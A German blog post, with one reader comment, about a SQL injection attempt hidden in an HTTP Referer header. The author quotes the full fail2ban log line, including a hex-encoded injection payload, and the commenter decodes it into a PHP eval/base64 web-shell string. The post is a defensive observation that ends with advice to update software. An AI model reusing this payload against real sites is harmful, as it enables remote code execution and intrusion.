Angriffsversuch per Referer
2. Mai 2021 um 17:13 Uhr von Atari-Frosch
Eben in einer Meldung von fail2ban gesehen:
114.219.10.161 - - [02/May/2021:08:02:47 +0200] "POST /user.php HTTP/1.1" 404 47 "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\x22num\x22;s:191:\x22*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7B24617364275D3B6576616C2F2A2A2F286261736536345F6465636F646528275A585A686243676B583142505531526259575274615735644B54733D2729293B2F2F7D787878,0--\x22;s:2:\x22id\x22;s:9:\x22' union/*\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Ohne Recherche: Das sieht erstmal … seltsam aus. Vermutlich müßte man die Hex-Zahlenreihen aufdröseln, um zu erfahren, was er wirklich wollte. Die lesbaren Strings „select“ und „union“ deuten aber auf einen SQL-Angriff hin. Nur: Warum steht der im Referer? Was würde denn darauf anspringen?
Nach Recherche: Nunja, offenbar funktioniert das tatsächlich in bestimmten Fällen: SQL Injection through HTTP Headers (Artikel von 2012):
Referer is another HTTP header which can be vulnerable to SQL injection once the application is storing it in database without sanitizing it. It’s an optional header field that allows the client to specify, for the server’s benefit, the address ( URI ) of the document (or element within the document) from which the URI in the request was obtained. This allows a server to generate lists of back-links to documents, for interest, logging, etc. It allows bad links to be traced for maintenance.
Da müßte man wohl auf sehr alte bzw. sehr schlecht gewartete oder programmierte Webserver-Software treffen, um damit in eine Datenbank zu gelangen.
Das Erschreckende daran: Wenn digitale Einbrecher sowas versuchen, dann, weil sie vermuten können, daß sie erfolgreich sein würden. Genauso wie bei Einbruchsversuchen an Blog-Logins mit dem generischen Usernamen „admin“. Es gibt offenbar noch so viele, daß sich das lohnt.
Kinners, macht Updates. Und wenn ein Dienst nicht mehr gebraucht wird, schaltet ihn ab.
3. Mai 2021 at 10:59
SQL-Injection, wie du ja schon gesagt hattest. Im zweiten String steht etwas wie „{$asd‘];eval/**/(base64_decode(‚ZXZhbCgkX1BPU1RbYWRtaW5dKTs=‘));//}“
Hoffentlich stürzt dein Blog jetzt nicht ab 😉
Kommentare im Hex-Teil, base64_decode, ich denke das war ein Script kid, das nicht weiß, was es tut. „Ähnliche“ dumme Angriffsversuche kommen auch immer auf dem ssh-Port rein. Natürlich ist da das Password dekativiert.